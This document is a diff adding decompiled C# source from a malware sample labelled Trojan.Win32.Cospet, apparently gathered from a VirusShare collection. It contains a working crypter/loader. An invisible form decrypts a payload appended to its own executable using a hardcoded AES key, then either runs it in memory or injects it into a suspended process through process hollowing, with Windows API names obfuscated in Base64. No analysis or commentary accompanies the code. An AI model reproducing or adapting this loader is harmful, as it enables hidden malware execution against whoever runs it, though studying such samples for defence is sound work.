+  internal class l1YmlpPMvQyqqZeffw : Form
+  {
+    private IContainer u0ejtRg5C;
+    private const string SXcEpLecu = "ᅕჯᅀᅕᄱᆲᆂᄐᅘᅕᆂၺᄷᅉᄢᄮᄽᆝᆲᆯᄄᆋᅿᇍᄊᄮჾᇊᅭᅘეၓᇷᆠᆋᆈᄁᆗრᅒᆻᅃᇐᆝᆗሆᇟᅿᆗဗᇱეᆻᇄሃᄥᇨᅉᇨᄢ̏Ϫ";
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public l1YmlpPMvQyqqZeffw()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      // ISSUE: explicit constructor call
+      base.\u002Ector();
+      this.Load += new EventHandler(this.ORG997Eyt);
+      this.u1SVD5csY();
+    }
+
+    [DebuggerNonUserCode]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    protected override void Dispose([In] bool obj0)
+    {
+      try
+      {
+        if (!obj0 || this.u0ejtRg5C == null)
+          return;
+        this.u0ejtRg5C.Dispose();
+      }
+      finally
+      {
+        base.Dispose(obj0);
+      }
+    }
+
+    [DebuggerStepThrough]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    private void u1SVD5csY()
+    {
+      this.SuspendLayout();
+      this.AutoScaleDimensions = new SizeF(6f, 13f);
+      this.AutoScaleMode = AutoScaleMode.Font;
+      this.ClientSize = new Size(10, 10);
+      this.FormBorderStyle = FormBorderStyle.None;
+      this.Name = tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(190);
+      this.Opacity = 0.0;
+      this.ShowIcon = false;
+      this.ShowInTaskbar = false;
+      this.WindowState = FormWindowState.Minimized;
+      this.ResumeLayout(false);
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    private void rSSBpBKPm([In] byte[] obj0)
+    {
+      Assembly assembly = Assembly.Load(obj0);
+      MethodInfo entryPoint = assembly.EntryPoint;
+      object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
+      entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
+      {
+        (object) new string[1]
+        {
+          tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(204)
+        }
+      });
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    private void ORG997Eyt([In] object obj0_1, [In] EventArgs obj1)
+    {
+      string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(210));
+      byte[] parameter = this.li87Z8Ac6(Convert.FromBase64String(strArray[1]));
+      Encoding.GetEncoding(1252).GetBytes(strArray[1]);
+      if (Conversions.ToBoolean(strArray[2]))
+      {
+        Thread thread = new Thread((ParameterizedThreadStart) (obj0_2 => this.rSSBpBKPm((byte[]) obj0_2)));
+        thread.TrySetApartmentState(ApartmentState.STA);
+        thread.Start((object) parameter);
+      }
+      else
+        this.lElT0QhP0(parameter, tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(338));
+    }
+
+    [DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)]
+    public static extern IntPtr \u0036jCbOnaNR([MarshalAs(UnmanagedType.VBByRefStr)] ref string _param0);
+
+    [DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
+    public static extern IntPtr pp7vagxki([In] IntPtr obj0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string _param1);
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public T w62GtbsBB<T>([In] string obj0, [In] string obj1) => (T) Marshal.GetDelegateForFunctionPointer(l1YmlpPMvQyqqZeffw.pp7vagxki(l1YmlpPMvQyqqZeffw.\u0036jCbOnaNR(ref obj0), ref obj1), typeof (T));
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public bool lElT0QhP0([In] byte[] obj0, [In] string obj1)
+    {
+      l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ obj2 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(448))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(476))));
+      l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv r9hFs0ZthQaZ334oHv = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(520))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(548))));
+      l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX dr45xqt8vapkmdO5jX = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(600))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(628))));
+      l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm zfvhinbtZbMtI7F6cm = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(680))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(708))));
+      l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy k3lty9wFb990IxNy = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(752))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(780))));
+      l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD eqihWru9Nn70v7Fbd = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(832))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(860))));
+      l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT ayi64li1PrjMwO41Zt = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(912))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(940))));
+      l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg obj3 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(976))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(996))));
+      bool flag;
+      try
+      {
+        IntPtr zero1 = IntPtr.Zero;
+        IntPtr[] numArray1 = new IntPtr[4];
+        byte[] numArray2 = new byte[68];
+        int int32_1 = BitConverter.ToInt32(obj0, 60);
+        int int16 = (int) BitConverter.ToInt16(obj0, checked (int32_1 + 6));
+        IntPtr num1 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 84)));
+        if (obj2((string) null, new StringBuilder(obj1), zero1, zero1, false, 4, zero1, (string) null, numArray2, numArray1))
+        {
+          uint[] numArray3 = new uint[179];
+          numArray3[0] = 65538U;
+          if (r9hFs0ZthQaZ334oHv(numArray1[1], numArray3))
+          {
+            IntPtr num2 = new IntPtr(checked ((long) numArray3[41] + 8L));
+            IntPtr zero2 = IntPtr.Zero;
+            IntPtr num3 = new IntPtr(4);
+            IntPtr zero3 = IntPtr.Zero;
+            if (dr45xqt8vapkmdO5jX(numArray1[0], num2, ref zero2, (int) num3, ref zero3) && obj3(numArray1[0], zero2) == 0U)
+            {
+              IntPtr num4 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 52)));
+              IntPtr num5 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 80)));
+              IntPtr num6 = zfvhinbtZbMtI7F6cm(numArray1[0], num4, num5, 12288, 64);
+              int int32_2 = num6.ToInt32();
+              int num7;
+              int num8 = k3lty9wFb990IxNy(numArray1[0], num6, obj0, checked ((uint) (int) num1), num7) ? 1 : 0;
+              int num9 = checked (int16 - 1);
+              int num10 = 0;
+              while (num10 <= num9)
+              {
+                int[] dst1 = new int[10];
+                Buffer.BlockCopy((Array) obj0, checked (int32_1 + 248 + num10 * 40), (Array) dst1, 0, 40);
+                byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
+                Buffer.BlockCopy((Array) obj0, dst1[5], (Array) dst2, 0, dst2.Length);
+                num5 = new IntPtr(checked (int32_2 + dst1[3]));
+                num4 = new IntPtr(dst2.Length);
+                int num11 = k3lty9wFb990IxNy(numArray1[0], num5, dst2, checked ((uint) (int) num4), num7) ? 1 : 0;
+                checked { ++num10; }
+              }
+              num5 = new IntPtr(checked ((long) numArray3[41] + 8L));
+              num4 = new IntPtr(4);
+              int num12 = k3lty9wFb990IxNy(numArray1[0], num5, BitConverter.GetBytes(num6.ToInt32()), checked ((uint) (int) num4), num7) ? 1 : 0;
+              numArray3[44] = checked ((uint) (num6.ToInt32() + BitConverter.ToInt32(obj0, int32_1 + 40)));
+              int num13 = eqihWru9Nn70v7Fbd(numArray1[1], numArray3) ? 1 : 0;
+            }
+          }
+          int num14 = (int) ayi64li1PrjMwO41Zt(numArray1[1]);
+        }
+      }
+      catch (Exception ex)
+      {
+        ProjectData.SetProjectError(ex);
+        flag = false;
+        ProjectData.ClearProjectError();
+        goto label_11;
+      }
+      flag = true;
+label_11:
+      return flag;
+    }
+
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public byte[] li87Z8Ac6([In] byte[] obj0)
+    {
+      using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
+      {
+        rijndaelManaged.IV = new byte[16]
+        {
+          (byte) 1,
+          (byte) 2,
+          (byte) 3,
+          (byte) 4,
+          (byte) 5,
+          (byte) 6,
+          (byte) 7,
+          (byte) 8,
+          (byte) 9,
+          (byte) 1,
+          (byte) 2,
+          (byte) 3,
+          (byte) 4,
+          (byte) 5,
+          (byte) 6,
+          (byte) 7
+        };
+        rijndaelManaged.Key = new byte[16]
+        {
+          (byte) 7,
+          (byte) 6,
+          (byte) 5,
+          (byte) 4,
+          (byte) 3,
+          (byte) 2,
+          (byte) 1,
+          (byte) 9,
+          (byte) 8,
+          (byte) 7,
+          (byte) 6,
+          (byte) 5,
+          (byte) 4,
+          (byte) 3,
+          (byte) 2,
+          (byte) 1
+        };
+        return rijndaelManaged.CreateDecryptor().TransformFinalBlock(obj0, 0, obj0.Length);
+      }
+    }
+
+    [return: MarshalAs(UnmanagedType.Bool)]
+    public delegate bool \u0039klfPRdkUkcORZqXqJ(
+      [In] string obj0,
+      [In] StringBuilder obj1,
+      [In] IntPtr obj2,
+      [In] IntPtr obj3,
+      [MarshalAs(UnmanagedType.Bool)] bool _param5,
+      [In] int obj5,
+      [In] IntPtr obj6,
+      [In] string obj7,
+      [In] byte[] obj8,
+      [In] IntPtr[] obj9);
+
+    public delegate bool qgK3lty9wFb990IxNy(
+      [In] IntPtr obj0,
+      [In] IntPtr obj1,
+      [In] byte[] obj2,
+      [In] uint obj3,
+      [In] int obj4);
+
+    [return: MarshalAs(UnmanagedType.Bool)]
+    public delegate bool DR45xqt8vapkmdO5jX(
+      [In] IntPtr obj0,
+      [In] IntPtr obj1,
+      [In] ref IntPtr obj2,
+      [In] int obj3,
+      [In] ref IntPtr obj4);
+
+    public delegate IntPtr ZfvhinbtZbMtI7F6cm(
+      [In] IntPtr obj0,
+      [In] IntPtr obj1,
+      [In] IntPtr obj2,
+      [In] int obj3,
+      [In] int obj4);
+
+    public delegate uint \u00331cnlp5hhg963mPuNg([In] IntPtr obj0, [In] IntPtr obj1);
+
+    public delegate uint Ayi64li1PRJMwO41ZT([In] IntPtr obj0);
+
+    [return: MarshalAs(UnmanagedType.Bool)]
+    public delegate bool r9hFs0ZTHQaZ334oHv([In] IntPtr obj0, [In] uint[] obj1);
+
+    [return: MarshalAs(UnmanagedType.Bool)]
+    public delegate bool hEqihWru9Nn70v7FBD([In] IntPtr obj0, [In] uint[] obj1);
+  }
+}
@@ -0,0 +1,9 @@
+// Decompiled with JetBrains decompiler
+// Type: <Module>{81A84E1E-6409-4B9D-B789-B9B5420A38D1}
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+internal class \u003CModule\u003E\u007B81A84E1E\u002D6409\u002D4B9D\u002DB789\u002DB9B5420A38D1\u007D
+{
+}
@@ -0,0 +1,30 @@
+// Decompiled with JetBrains decompiler
+// Type: wuZRSCSYdAj3YejFZe.DcHwE30dMCeD7BI4om
+// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
+
+using Microsoft.VisualBasic.Devices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using TmwCXiWu118CwLLcBx;
+
+namespace wuZRSCSYdAj3YejFZe
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class DcHwE30dMCeD7BI4om : Computer
+  {
+    [DebuggerHidden]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MethodImpl(MethodImplOptions.NoInlining)]
+    public DcHwE30dMCeD7BI4om()
+    {
+      qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
+      // ISSUE: explicit constructor call
+      base.\u002Ector();
+    }
+  }
+}